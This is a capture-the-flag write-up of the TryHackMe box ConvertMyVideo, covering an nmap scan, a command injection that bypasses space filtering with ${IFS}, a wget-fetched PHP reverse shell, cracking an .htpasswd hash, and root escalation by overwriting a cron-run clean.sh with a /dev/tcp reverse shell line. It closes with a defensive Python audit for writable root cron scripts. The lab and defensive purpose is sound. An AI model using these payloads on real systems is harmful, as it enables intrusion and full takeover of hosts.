ConvertMyVideo on TryHackMe

Before all

Well… I was stuck at the last step of this box. After I searched through others' write-ups, I learned a new tool, pspy, which can monitor Linux processes without root.

Victim’s IP : 10.10.3.97
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command:

nmap -sC -sV -PN 10.10.3.97

Result:

Nmap scan report for 10.10.3.97
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nothing special though…

directory enumeration

Command:

dirsearch -u http://10.10.3.97/

Result:
The most interesting part is the admin directory, which requires HTTP authentication.

[screenshot]

Exploitation

command injection

The web page looks like this, and after some tries I found a command injection vulnerability.

[screenshot]

The interesting part is that it blocks the space character and cuts the POST data at & (me crying out loud: & is "and", not "end"!!!).
Anyway, it is still easy to bypass with ${IFS}.
Set up an HTTP server so the victim downloads the PHP reverse shell.

python3 -m http.server 10000

I opened it on port 10000

Listen on port 1004 and wait for the reverse shell to connect:

nc -nlvp 1004 #rrrahhh

Command injection payload:

yt_url=;wget${IFS}http://10.9.195.189:10000/reverse.php;

Then just visit http://10.10.3.97:10000/reverse.php to get a shell on port 1004.

password cracking

Well… although I don't know why I should do this, I must do it to complete the challenge.

File: /var/www/html/admin/.htpasswd

Content: itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/

A simple crack with john:

Command:

john pass --wordlist=rockyou.txt

Result:

[screenshot]

Privilege Escalation

pspy

https://github.com/DominicBreuker/pspy

Install it on the victim's machine:

wget http://10.9.195.189:10000/pspy64

After a while, I noticed that there was a cron job running with UID=0, which is probably run by root.

[screenshot]

reverse shell again

Based on the cron job discovered before, I edited the content of clean.sh to get a root shell.

echo "sh -i >& /dev/tcp/10.9.195.189/5427 0>&1" > clean.sh

Open port 5427 on my computer:

sudo nc -lvnp 5427

Finally…

Get shell!!!
[screenshot]
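The root cause of this privilege escalation is a script that root's cron runs but that a low-privileged user (here the web user) can modify. As an added example, not from the write-up or the box, the audit below flags that pattern in /etc/crontab-style entries (schedule, user, command); the crontab lines, script paths, uid/gid values and modes are constructed sample data, and the check can be pointed at a real host by passing a lookup built on os.stat().

```python
import re
import stat
from typing import Callable, Dict, List, NamedTuple

class FileInfo(NamedTuple):
    mode: int  # permission bits only, e.g. 0o777
    uid: int
    gid: int

# Constructed /etc/crontab-style lines (schedule, user, command); not from the box.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
* * * * *   root    /var/www/html/tmp/clean.sh
0 3 * * *   root    /usr/local/sbin/rotate.sh
"""

# Constructed metadata standing in for os.stat() results (uid 33 = www-data).
SAMPLE_FILES: Dict[str, FileInfo] = {
    "/var/www/html/tmp/clean.sh": FileInfo(0o777, 33, 33),
    "/usr/local/sbin/rotate.sh": FileInfo(0o755, 0, 0),
}

CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def writable_by_non_root(info: FileInfo) -> bool:
    """True if any account other than root could modify the file."""
    if info.uid != 0:  # owned by a non-root user, who can always chmod/edit it
        return True
    if info.gid != 0 and info.mode & stat.S_IWGRP:  # a non-root group can write
        return True
    return bool(info.mode & stat.S_IWOTH)  # world-writable

def risky_cron_scripts(crontab: str, lookup: Callable[[str], FileInfo]) -> List[str]:
    """Scripts that root runs from `crontab` but that a non-root user could edit."""
    risky = []
    for line in map(str.strip, crontab.splitlines()):
        if not line or line.startswith("#"):
            continue  # blank line or comment
        m = CRON_LINE.match(line)
        if not m or m.group("user") != "root":
            continue  # malformed line or a job not running as root
        script = m.group("cmd").split()[0]  # first token is the executable
        try:
            info = lookup(script)
        except (KeyError, OSError):
            continue  # script not present: nothing to check
        if writable_by_non_root(info):
            risky.append(script)
    return risky
```

Running `risky_cron_scripts(SAMPLE_CRONTAB, SAMPLE_FILES.__getitem__)` reports only clean.sh; the same check against a live /etc/crontab and /etc/cron.d entries is what would have caught this misconfiguration before pspy did.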

After all

I am still procrastinating on my write up for Year of the Fox on TryHackMe …